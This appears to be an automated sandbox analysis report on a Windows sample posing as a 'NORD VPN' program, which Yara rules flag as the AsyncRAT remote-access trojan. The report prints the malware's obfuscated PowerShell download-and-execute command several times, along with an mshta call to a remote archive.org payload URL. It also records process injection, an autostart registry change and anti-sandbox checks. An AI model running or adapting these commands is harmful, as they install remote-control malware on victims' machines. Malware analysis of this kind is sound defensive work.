          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
          Source: C:\Users\user\Desktop\xGrfj8RvYg.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32
          Source: C:\Windows\System32\mshta.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
          Source: xGrfj8RvYg.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: xGrfj8RvYg.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: xGrfj8RvYg.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
          Source: Binary string: C:\Users\Win 10 test Antiviru\Desktop\NORD VPN\NORD VPN\obj\Debug\NORD VPN.pdb source: xGrfj8RvYg.exe

          Data Obfuscation:

          barindex
          Obfuscated command line found
          Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' $TTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTT ='https://ia601509.us.archive.org/21/items/all-lol-123_20210603/ALL_lol123.TXT';$SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS='Down^^^^^^^^^^^^^string'.Replace('^^^^^^^^^^^^^','load');$OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO = 'WebBANKnt'.Replace('BANK','Clie');$T4RDTHFTJGJKHL='WFt'.Replace('WF','NE');$EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE='(NewYEAe'.Replace('YEA','-Obj');$FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF='ct System.$T4RDTHFTJGJKHL.$OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO).$SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS($TTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTT)';I`E`X ($EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE,$FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF -Join '')|I`E`X
          Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' $TTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTT ='https://ia601509.us.archive.org/21/items/all-lol-123_20210603/ALL_lol123.TXT';$SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS='Down^^^^^^^^^^^^^string'.Replace('^^^^^^^^^^^^^','load');$OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO = 'WebBANKnt'.Replace('BANK','Clie');$T4RDTHFTJGJKHL='WFt'.Replace('WF','NE');$EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE='(NewYEAe'.Replace('YEA','-Obj');$FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF='ct System.$T4RDTHFTJGJKHL.$OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO).$SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS($TTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTT)';I`E`X ($EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE,$FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF -Join '')|I`E`X
          Source: xGrfj8RvYg.exeStatic PE information: 0xDE169215 [Tue Jan 27 05:52:21 2088 UTC]

          Boot Survival:

          barindex
          Yara detected AsyncRAT
          Source: Yara matchFile source: 00000017.00000000.310047645.0000000000402000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000017.00000002.467029735.0000000000402000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000017.00000002.470750040.0000000002BE1000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: aspnet_compiler.exe PID: 6396, type: MEMORY
          Source: Yara matchFile source: 23.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 23.0.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
          Creates an undocumented autostart registry key
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders Startup
          Source: C:\Windows\System32\mshta.exeRegistry key monitored for changes: HKEY_CURRENT_USER_Classes
          Source: C:\Users\user\Desktop\xGrfj8RvYg.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\xGrfj8RvYg.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\xGrfj8RvYg.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\xGrfj8RvYg.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\xGrfj8RvYg.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\xGrfj8RvYg.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\xGrfj8RvYg.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\xGrfj8RvYg.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\xGrfj8RvYg.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\xGrfj8RvYg.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\xGrfj8RvYg.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\xGrfj8RvYg.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | Process information set: NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          Yara detected AsyncRAT
          Source: Yara match | File source: 00000017.00000000.310047645.0000000000402000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000017.00000002.467029735.0000000000402000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000017.00000002.470750040.0000000002BE1000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: Process Memory Space: aspnet_compiler.exe PID: 6396, type: MEMORY
          Source: Yara match | File source: 23.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 23.0.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
          Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
          Source: aspnet_compiler.exe, 00000017.00000000.310047645.0000000000402000.00000040.00000001.sdmp | Binary or memory string: SBIEDLL.DLL
          Source: C:\Windows\System32\mshta.exe | File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: C:\Users\user\Desktop\xGrfj8RvYg.exe | Thread delayed: delay time: 922337203685477
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | Thread delayed: delay time: 922337203685477
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 2688
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 6527
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 6447
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 1046
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | Window / User API: threadDelayed 6909
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | Window / User API: threadDelayed 2765
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | Window / User API: threadDelayed 406
          Source: C:\Users\user\Desktop\xGrfj8RvYg.exe TID: 5568 | Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5488 | Thread sleep time: -6456360425798339s >= -30000s
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4356 | Thread sleep count: 6447 > 30
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4348 | Thread sleep count: 1046 > 30
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2220 | Thread sleep time: -2767011611056431s >= -30000s
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2220 | Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe TID: 6532 | Thread sleep time: -3689348814741908s >= -30000s
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe TID: 6532 | Thread sleep count: 34 > 30
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe TID: 6540 | Thread sleep count: 6909 > 30
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe TID: 6540Thread sleep count: 2765 > 30
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeFile Volume queried: C:\ FullSizeInformation
          Source: C:\Users\user\Desktop\xGrfj8RvYg.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 922337203685477
          Source: powershell.exe, 00000003.00000002.484716510.0000027D9FCE0000.00000002.00000001.sdmp, aspnet_compiler.exe, 00000017.00000002.477044465.00000000054D0000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
          Source: aspnet_compiler.exe, 00000017.00000000.310047645.0000000000402000.00000040.00000001.sdmpBinary or memory string: vmware
          Source: aspnet_compiler.exe, 00000017.00000002.469001250.0000000000E65000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll/
          Source: mshta.exe, 00000002.00000002.216660984.0000020091B0A000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW
          Source: powershell.exe, 00000003.00000002.484716510.0000027D9FCE0000.00000002.00000001.sdmp, aspnet_compiler.exe, 00000017.00000002.477044465.00000000054D0000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
          Source: powershell.exe, 00000003.00000002.484716510.0000027D9FCE0000.00000002.00000001.sdmp, aspnet_compiler.exe, 00000017.00000002.477044465.00000000054D0000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
          Source: powershell.exe, 00000003.00000002.484398533.0000027D9F8A2000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
          Source: powershell.exe, 00000003.00000002.484716510.0000027D9FCE0000.00000002.00000001.sdmp, aspnet_compiler.exe, 00000017.00000002.477044465.00000000054D0000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess token adjusted: Debug
          Source: C:\Users\user\Desktop\xGrfj8RvYg.exeMemory allocated: page read and write | page guard

          HIPS / PFW / Operating System Protection Evasion:

          Injects a PE file into a foreign processes
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 400000 value starts with: 4D5A
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 400000 value starts with: 4D5A
          Writes to foreign memory regions
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 400000
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 402000
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 40E000
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 410000
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 923008
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 400000
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 402000
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 404000
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 406000
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: DA9008
          Source: C:\Users\user\Desktop\xGrfj8RvYg.exe | Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' https://ia601502.us.archive.org/2/items/clean-lol-123_20210603/Clean_lol123.txt
          Source: C:\Windows\System32\mshta.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' $TTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTT ='https://ia601509.us.archive.org/21/items/all-lol-123_20210603/ALL_lol123.TXT';$SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS='Down^^^^^^^^^^^^^string'.Replace('^^^^^^^^^^^^^','load');$OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO = 'WebBANKnt'.Replace('BANK','Clie');$T4RDTHFTJGJKHL='WFt'.Replace('WF','NE');$EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE='(NewYEAe'.Replace('YEA','-Obj');$FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF='ct System.$T4RDTHFTJGJKHL.$OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO).$SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS($TTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTT)';I`E`X ($EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE,$FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF -Join '')|I`E`X
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -windo 1 -noexit -exec bypass -file C:\Users\Public\-----Run+++++++++.ps1
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
          Source: C:\Windows\System32\mshta.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' $TTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTT ='https://ia601509.us.archive.org/21/items/all-lol-123_20210603/ALL_lol123.TXT';$SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS='Down^^^^^^^^^^^^^string'.Replace('^^^^^^^^^^^^^','load');$OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO = 'WebBANKnt'.Replace('BANK','Clie');$T4RDTHFTJGJKHL='WFt'.Replace('WF','NE');$EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE='(NewYEAe'.Replace('YEA','-Obj');$FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF='ct System.$T4RDTHFTJGJKHL.$OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO).$SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS($TTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTT)';I`E`X ($EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE,$FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF -Join '')|I`E`X
          Source: C:\Windows\System32\mshta.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' $TTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTT ='https://ia601509.us.archive.org/21/items/all-lol-123_20210603/ALL_lol123.TXT';$SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS='Down^^^^^^^^^^^^^string'.Replace('^^^^^^^^^^^^^','load');$OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO = 'WebBANKnt'.Replace('BANK','Clie');$T4RDTHFTJGJKHL='WFt'.Replace('WF','NE');$EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE='(NewYEAe'.Replace('YEA','-Obj');$FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF='ct System.$T4RDTHFTJGJKHL.$OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO).$SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS($TTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTT)';I`E`X ($EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE,$FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF -Join '')|I`E`X
          Source: powershell.exe, 00000003.00000002.470709255.0000027D85B90000.00000002.00000001.sdmp, aspnet_compiler.exe, 00000017.00000002.471299747.0000000002C3C000.00000004.00000001.sdmp, aspnet_compiler.exe, 00000019.00000002.469212629.00000000018D0000.00000002.00000001.sdmp | Binary or memory string: Program Manager
          Source: powershell.exe, 00000003.00000002.470709255.0000027D85B90000.00000002.00000001.sdmp, aspnet_compiler.exe, 00000017.00000002.470083278.00000000014C0000.00000002.00000001.sdmp, aspnet_compiler.exe, 00000019.00000002.469212629.00000000018D0000.00000002.00000001.sdmp | Binary or memory string: Shell_TrayWnd
          Source: powershell.exe, 00000003.00000002.470709255.0000027D85B90000.00000002.00000001.sdmp, aspnet_compiler.exe, 00000017.00000002.470083278.00000000014C0000.00000002.00000001.sdmp, aspnet_compiler.exe, 00000019.00000002.469212629.00000000018D0000.00000002.00000001.sdmp | Binary or memory string: Progman
          Source: powershell.exe, 00000003.00000002.470709255.0000027D85B90000.00000002.00000001.sdmp, aspnet_compiler.exe, 00000017.00000002.470083278.00000000014C0000.00000002.00000001.sdmp, aspnet_compiler.exe, 00000019.00000002.469212629.00000000018D0000.00000002.00000001.sdmp | Binary or memory string: Progmanlock
          Source: C:\Users\user\Desktop\xGrfj8RvYg.exe | Queries volume information: C:\Users\user\Desktop\xGrfj8RvYg.exe VolumeInformation
          Source: C:\Windows\System32\mshta.exe | Queries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation
          Source: C:\Windows\System32\mshta.exe | Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation
          Source: C:\Windows\System32\mshta.exe | Queries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation
          Source: C:\Windows\System32\mshta.exe | Queries volume information: C:\Windows\Fonts\times.ttf VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\1.2\Microsoft.PowerShell.PSReadline.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
